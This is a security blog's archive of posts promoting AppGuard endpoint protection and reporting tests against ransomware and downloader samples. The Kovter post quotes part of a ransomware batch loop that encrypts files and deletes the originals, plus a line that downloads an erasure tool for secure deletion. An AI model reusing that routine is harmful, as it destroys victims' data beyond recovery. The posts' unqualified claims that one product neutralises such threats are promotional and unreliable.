Tag Archives: AppGuard

AutoIt Scripting Used By Overlay Malware to Bypass AV Detection

13 November 2017

Seven Phases Cyber Kill Chain

Cyber Kill Chain

Anti-Virus (AV) protection works fine if the attacker uses a well-known malware, e.g. Locky, or one of its variants. In this case, the AV scan engine computes the fingerprint of the malicious object and checks it against its fingerprint database. Since a fingerprint is available, the attack is stopped in the delivery phase of a cyber attack the latest.

In the case of the AutoIt Overlay Malware the attacker hides the pattern in an AutoIt script which results in a modified fingerprint. Since this fingerprint is not known in the database the AV scan engine cannot stop the attack. For details about the AutoIt Overlay Malware see this excellent report by Gadi Ostrovsky published on November 8, 2017 in the IBM Security Intelligence blog

Anti-Virus evasion techniques are well known for years. Thus companies are well advised to rely not only on an anti-malware system in their endpoint protection strategy.

My favorite add-on to Anti-Malware systems is still Blue Ridge Networks AppGuard because its available for consumers as well as for businesses. AppGuard would block the AutoIt Overlay Malware during the installation phase the latest because it just blocks the execution of whatever objects from inside a user’s home directory.

Have a great week.

Advertisements

Locky deployment methods just changed – Who cares?

30 July 2016

The Post ‘Locky Dropper Now Comes Embedded in the Loader’, published July 28, 2016 in the ReaQta Security Blog, clearly shows that the cyber criminals continuously develop and improve their products. In the past, Locky downloaded the encryption program from a command & control server. In the latest version the encryption program is embedded in the email attachment as strings. The moment the victim runs the loader, the encryption program is extracted from the strings to the User Space and executed from User Space.

This is no rocket science; simply the application of well-known obfuscation methods to the latest Locky variant.

And, with AppGuard installed on top of the security stack, this new Locky variant represents no real danger.

In my opinion, the next generation endpoint protection solutions available on the market will all deal effectively with this sort of zero-day malware. The example of AppGuard shows: It is simply install and forget.

With this, we will gain valuable time for the right and important things like the implementation of Two Factor Authentication or privileged accounts management, or the design of effective security procedures or user training. Unfortunately, the paradigm shift from prevention to detection prevents us from implementing and doing the right and important things. It’s time for a paradigm change…

Have a good weekend.

AppGuard is an important part of a comprehensive security stack

16 July 2016

In the past weeks I tried hard to get an idea of the capabilities of Blue Ridge Networks AppGuard. To be honest, I would not like to miss AppGuard anymore. AppGuard creates the really good feeling that, under certain conditions, many cyber-attacks are simply rendered ineffective.

AppGuard is a perfect means against all kind of Trojans and downloaders, in particular zero days. Characteristic for this kind of malware is that the malware directly drops a malicious program or downloads a malicious program from the attacker’s server and executes it afterwards. This includes e.g. most of the known Ransomware.

The User Space and MemoryGuard concept just blocks this kind of malware out-of-the-box, provided that the User Space concept is not undermined by a user who is working with high privileges permanently. In fact, if the user works with privileges which allow the Trojan program to store files outside the User Space, the concept will no longer work.

It is strongly recommended to work with the least possible privileges under normal conditions. For the case higher privileges are requested, set up an extra account with the required privileges and supply the credentials of this account if UAC requests higher privileges.

More advanced malware may try to use the Windows auto-elevation feature to acquire higher privileges and to compromise AppGuard. To protect from auto-elevation attacks just set UAC to ‘Always notify me’.

This works even in the case of a gaming computer, where e.g. WOW and TeamSpeak are heavily used. Why shouldn’t it work on a standard system?

In addition, it is strongly recommended to disable macro execution in all kind of office software, e.g. Microsoft Office, OpenOffice or LibreOffice.

Memory Guard protects against all kind of zero-day drive-by downloads, PuP (Potentially unwanted Programs) or file-less malware.

My comprehensive security stack

My comprehensive security stack. Click to enlarge.

 

AppGuard does not protect against any kind of password phishing attacks. Although popular internet browsers block many malicious URLs through URL reputation, e.g. SmartScreen Filtering in Internet Explorer or Firefox, this will not protect in the case of zero-days.

To reduce the likelihood of credential theft, turn on Two-Factor Authentication (TFA) for as many as possible internet services you use. If TFA cannot be enabled, choose a strong password and take care, means:

User awareness is the basic part of the entire security stack!

To put it succinctly: The proposed security stack will dramatically reduce the risk of cyber-attacks. Blue Ridge Networks AppGuard is an important component of this stack, in particular for the protection against all kind of zero-days.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations I worked mainly on my test system in the past weeks. My test system is a 6 years old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD.  The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kind of zero days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of e.g. JavaScript based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution all kind of zero-day malware from user space. But how well works AppGuard in the case of somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products identified malware:

Antivirus Result Update
Fortinet WM/Poseket.A!tr.dldr 20160706
Qihoo-360 heur.macro.powershell.a 20160706
Symantec W97M.Downloader 20160706

As always, the AutoOpen macro is password protected. But LibreOffice overrides the password protection and reveals a master piece of code:

AutoOpen Macro with Powershell code

AutoOpen Macro with PowerShell Code

I opened the document and followed the instructions to execute the AutoOpen macro.

Invoice_201604469.doc

Invoice_201604469.doc. Click to enlarge.

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

Blocked Program Message

Blocked Program Message 1

Blocked Program Message

Blocked Program Message 2

Thus the command shell wasn’t able to start the payload and Windows displayed the last error message:

Windows Error Message

Windows Error Message

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complete the Windows built-in security features, and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

Developers of Ransomware JS/Nemucod.FG and Kovter take security seriously

25 June 2016

Ransomware Kovter is delivered e.g. through a malicious email attachment named Court_Notification_0000928697.doc.js. The developers of this script take security really serious.

The script downloads encryption programs from a list of malicious sites. It then calls the windows command shell and loops through every fixed and network drive in its search for files to be encrypted. The command below shows a code fragment for the encryption of files stored on drive C:

for /r "C:\" %i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.do ... ) do (
      (ECHO "%~pi" | FINDSTR /I "appdata application ... " 1>NUL)) ||
      (if %~zi LSS 10000000 if %~zi GTR 10000 (
(1)          call %TEMP%\a1.exe -mx0 -mhe -p"<Encryption Key>" "%i.crypted" "%i"
(2)          Delete %i
             ECHO %i >>"%TEMP%\a.log"
       )
       )
)

The encryption program a1.exe (1) creates an encrypted copy with extension crypted, In the next step the script deletes (2) the original file.

The Delete command is somewhat special in this case. The script downloads the program Sdelete from Windows Sysinternals and stores the downloaded file in %TEMP%\a9.exe:

xo.open("GET","https:´//live.sysinternals.com/sdelete.exe", false); 
...
if(xa.size>100000) { xa.saveToFile(%TEMP%\a9.exe",2);};

If the download is successful command a9.exe -a -q is used to delete the original file.

From the Sysinternals homepage one learns that

SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever.

With this it is not possible to recover the deleted files with disk utilities or with the help of a data rescue lab.

Fortunately, the encryption programs are downloaded to User Space. Within the download loop the developer checks whether the program can be executed on the system. Since the program is executed from User Space AppGuard blocks the execution and prevents the script from starting the main loop over all drives and about 80 file types:

AppGuard stops A2.exe

AppGuard stops A2.exe

Appguard stops A1.exe

AppGuard stops A1.exe

In this case the java script loads two encryption programs from the attacker’s download servers. A2.exe is identified as Trojan:Win32/Dynamer!ac (Microsoft) or BehavesLike.Win32.Ramnit.cc (McAfee Gateway Edition), A1.exe as Trojan:Win32/Kovter!rfn (Microsoft) or Trojan-FIMO!571F44310A86 (McAfee Gateway Edition). The script is identified as TrojanDownloader:JS/Nemucod.FG (Microsoft) or JS/Nemucod.ie (McAfee Gateway Edition).

Take care! And have a good weekend.

AppGuard protection concepts II

19 June 2016

Preventing the execution of whatever scripts or executables from User Space is one of the basic security concepts of AppGuard. Unfortunately, the User Space concept does not work in the case of fileless malware. A very prominent representative of this malware type is Poweliks.  Poweliks was first detected in August 2014. It hides its payload in the Windows registry, no file is written during the first infection phase.

In the McAfee Labs Threats Report: November 2015 McAfee researchers described in detail how the fileless Kovter malware infects a victim’s system. Kovter writes JavaScript to the registry. This script calls an encrypted PowerShell Script which is also stored in the registry. Finally, the code is written to the memory of another process and executed within the context of this memory.

During this last write process AppGuard’s MemoryGuard enters the game:

Memory protection is designed to prevent one process (originator) from altering or reading the memory of another process (target). Attackers try to re-allocate memory, place executable code into the newly allocated memory, and then execute this code. This type of attack is known as memory code injection and memory scraping. This attack has been widely used in file-less malware which exists only in memory, and Trojan downloader type of malware.

Sound’s easy. Again, ProcessExplorer is the perfect means to show how MemoryGuard works:

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree in Protected Mode

Process Explorer: User Process Tree in Protected Mode

In Protected mode icons and process descriptions are no longer displayed. Process Explorer retrieves these details from the process memory, and MemoryGuard blocks read access.

Process Explorer: Regedit Process Details Unprotected

Process Explorer: Process Details Unprotected

Process Explorer: Regedit Process Details Protected

Process Explorer: Process Details Protected

In Protected mode important process details are no longer displayed. Process Explorer reads these details from a process’ memory and displays them in the Properties dialogue. If AppGuard is operated in the default mode Protected, MemoryGuard blocks this reading operations, thus details about the process cannot be retrieved.

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

Have a good weekend.

New developments in the field of ransomware

11 June 2016

During my test of AppGuard some new variants of ransomware showed up in the wild.

ReaQta reported a new and massive worldwide Locky ransomware spam campaign. The new variant downloads the payload in encrypted form from the attacker’s command and control server and decrypts it before execution on the victim’s system. This makes it harder for traditional anti-malware systems to identify the payload as malicious.

Since the decrypted version is executed from User Space AppGuard blocks the execution.

Microsoft reported a new variant called ZCryptor which behaves like a worm:

‘ZCryptor can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. This means the ransomware can spread itself to other machines on portable storage devices, rather than relying on more targets to fall victim to phishing, according to Microsoft’s security advisory.’

I had to deactivate all Windows 10 security features on my test system to download the malware sample from malwr.com to the User Space of my account:

Timestamp MD5 File Name File Type Antivirus
May 27, 2016, 6:43 p.m. d1e75b274211a78d9c5d38c8ff2e1778 zcrypt.ex_ PE32 executable (GUI) Intel 80386, for MS Windows 39/57

AppGuard runs out-of-the-box in protection mode Protected with default User Space settings.

Again, AppGuard blocked the execution of z_crypt.exe, thus prevented the malware from becoming persistent and from encrypting my documents:

AppGuard stops ZCryptor

AppGuard stops ZCryptor

Even if one receives ZCryptor on a portable device AppGuard will block the execution due to the default Removable Media rule:

AppGuard Removable Media default rule

AppGuard Removable Media default rule

More about AppGuard next week.

Have a good weekend.